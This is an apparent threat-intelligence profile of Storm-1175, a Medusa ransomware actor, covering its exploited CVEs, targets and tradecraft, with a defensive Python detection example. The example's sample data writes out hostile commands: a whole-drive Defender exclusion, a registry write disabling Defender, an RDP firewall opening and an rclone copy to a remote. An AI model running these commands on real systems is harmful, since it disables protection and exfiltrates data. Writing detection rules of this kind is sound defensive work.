Storm-1175
Storm-1175 is a Microsoft-tracked, financially motivated cybercrime threat actor associated with Medusa ransomware. Multiple sources in the provided content describe the actor as China-based or a Chinese financially motivated threat operation. The group conducts high-velocity ransomware campaigns against vulnerable internet-facing systems, often moving from initial exploitation to data exfiltration and Medusa deployment within a few days and in some cases within 24 hours.

Storm-1175 primarily exploits newly disclosed N-day vulnerabilities during the gap between disclosure and patch adoption, but the content also states it has used zero-day vulnerabilities, including exploitation of CVE-2025-10035 in Fortra GoAnywhere MFT and CVE-2026-23760 in SmarterMail before public disclosure. Across the provided reporting, Microsoft linked Storm-1175 to exploitation of more than 16 vulnerabilities since 2023, including CVE-2023-21529 in Microsoft Exchange, CVE-2023-27350 and CVE-2023-27351 in PaperCut, CVE-2023-46805 and CVE-2024-21887 in Ivanti Connect Secure and Policy Secure, CVE-2024-1708 and CVE-2024-1709 in ConnectWise ScreenConnect, CVE-2024-27198 and CVE-2024-27199 in JetBrains TeamCity, CVE-2024-57726 through CVE-2024-57728 in SimpleHelp, CVE-2025-31161 in CrushFTP, CVE-2025-10035 in GoAnywhere MFT, CVE-2025-52691 and CVE-2026-23760 in SmarterMail, CVE-2025-31324 in SAP NetWeaver, and CVE-2026-1731 in BeyondTrust.

The actor targets organizations in the United States, the United Kingdom, and Australia. Sectors explicitly mentioned in the content include healthcare, education, finance, professional services, law firms, hospitals, schools, and services. Recent reporting says healthcare organizations were heavily impacted.
Observed tradecraft includes exploitation of public-facing applications for initial access; use of web shells or remote access payloads for persistence; creation of new user or administrator accounts; lateral movement with PowerShell, PsExec, RDP, mstsc.exe, Cloudflare tunnels, and remote monitoring and management tools; credential theft using Impacket and Mimikatz; LSASS dumping; WDigest changes; access to NTDS.dit and SAM; use of PDQ Deployer and Group Policy for broad ransomware deployment; and exfiltration with Rclone after staging data with Bandizip. The content also states Storm-1175 tampers with Microsoft Defender Antivirus by modifying registry settings and adding the C:\ drive to antivirus exclusion paths, and has used Windows Firewall policy changes to enable RDP. RMM tools and related software named in the content include AnyDesk, Atera, MeshAgent, ConnectWise ScreenConnect, SimpleHelp, Level RMM, N-able, and DWAgent. The content also links Storm-1175 to Medusa affiliate activity and notes that techniques observed in Medusa affiliate operations tied to Storm-1175 were adopted by groups deploying Akira and Black Basta payloads. No additional aliases or sub-group names for Storm-1175 are provided in the content beyond the Microsoft tracking name Storm-1175.
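The defensive side of the tradecraft above is largely a matter of spotting a handful of host-level actions in process-creation telemetry: a Microsoft Defender exclusion that covers an entire drive, Defender policy changes written through the registry, a Windows Firewall change that opens Remote Desktop, Bandizip staging, and Rclone copies to a remote. The following is an added example, not Mallory's, Microsoft's or any vendor's detection content; it runs a small rule set over constructed sample command lines and then correlates per host, so that a machine showing both defense evasion and exfiltration stands out from one that only had a narrow, plausibly legitimate exclusion added. The host names, user names and command lines are constructed, and the Bandizip command-line syntax is illustrative only (the rule matches on the executable name).

```python
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    tactic: str
    command_line: str


# Constructed sample process-creation records; not real telemetry.
SAMPLE_EVENTS = [
    {"host": "srv01", "user": "svc_app",
     "command_line": r'powershell.exe -c "Add-MpPreference -ExclusionPath C:\"'},
    {"host": "srv01", "user": "svc_app",
     "command_line": r'reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f'},
    {"host": "srv02", "user": "admin2",
     "command_line": r'netsh.exe advfirewall firewall set rule group="remote desktop" new enable=Yes'},
    {"host": "srv02", "user": "admin2",
     "command_line": r"rclone.exe copy D:\staging remote:bucket --transfers 8"},
    {"host": "srv03", "user": "alice",
     "command_line": r"Bandizip.exe c C:\temp\stage.zip C:\Users\alice\Documents"},  # syntax illustrative
    {"host": "ws10", "user": "bob",  # narrow exclusion: not a whole-drive exclusion, so no finding
     "command_line": r"powershell.exe -c \"Add-MpPreference -ExclusionPath 'C:\Program Files\VendorApp'\""},
]

# Path argument of -ExclusionPath, with or without surrounding quotes.
_EXCL_PATH = re.compile(r"-ExclusionPath\s+['\"]?([A-Za-z]:\\?[^'\"\s]*)", re.IGNORECASE)
# A bare drive root such as C: or C:\ (no further path components).
_DRIVE_ROOT = re.compile(r"[A-Za-z]:\\?")


def whole_drive_exclusion(cmd: str) -> bool:
    # Fires only when the excluded path is an entire drive, the pattern the page describes.
    m = _EXCL_PATH.search(cmd)
    return bool(m and _DRIVE_ROOT.fullmatch(m.group(1)))


def defender_registry_tamper(cmd: str) -> bool:
    # reg.exe writes under the Windows Defender policy key, or Set-MpPreference turning off real-time protection.
    c = cmd.lower()
    reg_write = "windows defender" in c and re.search(r"\breg(\.exe)?\s+add\b", c) is not None
    return reg_write or "-disablerealtimemonitoring" in c


def firewall_rdp_enabled(cmd: str) -> bool:
    # netsh advfirewall or the NetFirewallRule cmdlets enabling the Remote Desktop group / port 3389.
    c = cmd.lower()
    netsh = ("advfirewall" in c and ("remote desktop" in c or "3389" in c)
             and ("enable=yes" in c or "action=allow" in c))
    ps = "netfirewallrule" in c and "remote desktop" in c and ("enable-" in c or "-enabled true" in c)
    return netsh or ps


def rclone_exfil(cmd: str) -> bool:
    # Rclone transfer verbs; listing commands alone do not fire.
    return re.search(r"\brclone(\.exe)?\b.*\b(copy|sync|move)\b", cmd, re.IGNORECASE) is not None


def bandizip_staging(cmd: str) -> bool:
    return re.search(r"\bbandizip(\.exe)?\b", cmd, re.IGNORECASE) is not None


# (rule name, tactic label, predicate). Tactic labels are coarse ATT&CK-style groupings.
RULES = [
    ("defender_whole_drive_exclusion", "defense-evasion", whole_drive_exclusion),
    ("defender_registry_tamper", "defense-evasion", defender_registry_tamper),
    ("firewall_rdp_enabled", "lateral-movement", firewall_rdp_enabled),
    ("bandizip_staging", "collection", bandizip_staging),
    ("rclone_exfil", "exfiltration", rclone_exfil),
]


def scan(events):
    """Apply every rule to every record; return one Finding per (record, rule) hit."""
    findings = []
    for ev in events:
        for name, tactic, pred in RULES:
            if pred(ev["command_line"]):
                findings.append(Finding(ev["host"], name, tactic, ev["command_line"]))
    return findings


def hosts_with_chained_tactics(findings, min_tactics=2):
    """Hosts where rules from at least `min_tactics` distinct tactics fired: the
    compressed intrusion chain (evade, open RDP, stage, exfiltrate) rather than one noisy admin action."""
    tactics = defaultdict(set)
    for f in findings:
        tactics[f.host].add(f.tactic)
    return sorted(h for h, t in tactics.items() if len(t) >= min_tactics)


if __name__ == "__main__":
    hits = scan(SAMPLE_EVENTS)
    for f in hits:
        print(f"{f.host:6} {f.tactic:17} {f.rule:32} {f.command_line}")
    print("hosts with chained tactics:", hosts_with_chained_tactics(hits))
```

The whole-drive rule is deliberately stricter than "any exclusion was added": adding a vendor directory is routine administration, while excluding `C:\` outright has almost no legitimate use. Per-host correlation across tactics is what turns these individually weak signals into something worth paging on, given how quickly the actor moves from exploitation to Medusa deployment.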
Targeting
Who, where, and (when attributed) which flag flies behind the operation. Pulled from open-source reporting and Mallory's analyst review.
Who they target
Sectors the actor has been observed targeting.
- Health Care Equipment & Services
- Financials
- Utilities
Tradecraft
35 distinct techniques observed across reporting, grouped by tactic.
Associated malware families
12 malware families attributed to this actor across reporting.
7 additional families tracked in Mallory.
Associated vulnerabilities
21 CVEs this actor has used in observed campaigns. 21 of them exploited in the wild.
Additionally, Storm-1175 weaponized CVE-2025-10035, a maximum-severity flaw in GoAnywhere Managed File Transfer's (MFT) License Servlet. Microsoft noted that both CVEs were exploited about a week before public disclosure.
The Microsoft Exchange Server deserialization of untrusted data bug, tracked as CVE-2023-21529, was included in the CISA list after being leveraged by Chinese financially motivated threat operation Storm-1175 to spread the Medusa ransomware.
In early 2026, they hit a service called SmarterMail (CVE-2026-23760) a full week before anyone knew a flaw existed.
Further investigation revealed that the group has exploited more than 16 different flaws since 2023, including software like Papercut (CVE-2023-27351) and JetBrains TeamCity (CVE-2024-27198).
16 more CVEs tied to this actor tracked in Mallory.
Observables
7 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting.
Recent activity
20 sources tracked across advisories, community write-ups, and news.
A threat actor group behind Medusa ransomware activity, notable for rapid exploit-led intrusions and highly compressed attack lifecycles.
China-based threat actor linked to exploitation of ConnectWise ScreenConnect flaws in attacks deploying Medusa ransomware.
Activity cluster linked to Medusa affiliates observed using ESXi privilege abuse techniques in high-tempo ransomware operations.
Chinese financially motivated threat operation observed leveraging CVE-2023-21529 to spread Medusa ransomware.